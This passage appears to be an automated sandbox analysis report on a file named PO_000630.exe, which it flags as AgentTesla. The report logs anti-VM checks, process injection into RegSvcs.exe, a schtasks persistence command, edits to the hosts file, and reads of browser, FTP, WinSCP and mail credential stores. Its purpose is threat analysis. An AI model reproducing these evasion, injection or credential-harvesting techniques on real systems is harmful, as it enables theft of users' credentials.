                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: PO_000630.exe PID: 6444, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PO_000630.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\PO_000630.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 953
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8851
                      Source: C:\Users\user\Desktop\PO_000630.exe TID: 6448Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\Desktop\PO_000630.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6452Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5088Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\PO_000630.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\Desktop\PO_000630.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: RegSvcs.exe, 00000006.00000002.606637146.0000000005A40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: RegSvcs.exe, 00000006.00000002.606834091.0000000005B30000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll23242526MappingStrings
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: RegSvcs.exe, 00000006.00000002.606637146.0000000005A40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: RegSvcs.exe, 00000006.00000002.606637146.0000000005A40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: PO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: RegSvcs.exe, 00000006.00000002.606637146.0000000005A40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00CCDAE0 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
                      Source: C:\Users\user\Desktop\PO_000630.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 629008
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wDToQaa' /XML 'C:\Users\user\AppData\Local\Temp\tmp647A.tmp'
                      Source: C:\Users\user\Desktop\PO_000630.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                      Source: RegSvcs.exe, 00000006.00000002.601695908.0000000001260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000006.00000002.601695908.0000000001260000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000006.00000002.601695908.0000000001260000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                      Source: RegSvcs.exe, 00000006.00000002.601695908.0000000001260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\PO_000630.exeQueries volume information: C:\Users\user\Desktop\PO_000630.exe VolumeInformation
                      Source: C:\Users\user\Desktop\PO_000630.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO_000630.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO_000630.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO_000630.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05E35594 GetUserNameW,
                      Source: C:\Users\user\Desktop\PO_000630.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.4107d60.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6748, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_000630.exe PID: 6444, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.4107d60.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6748, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
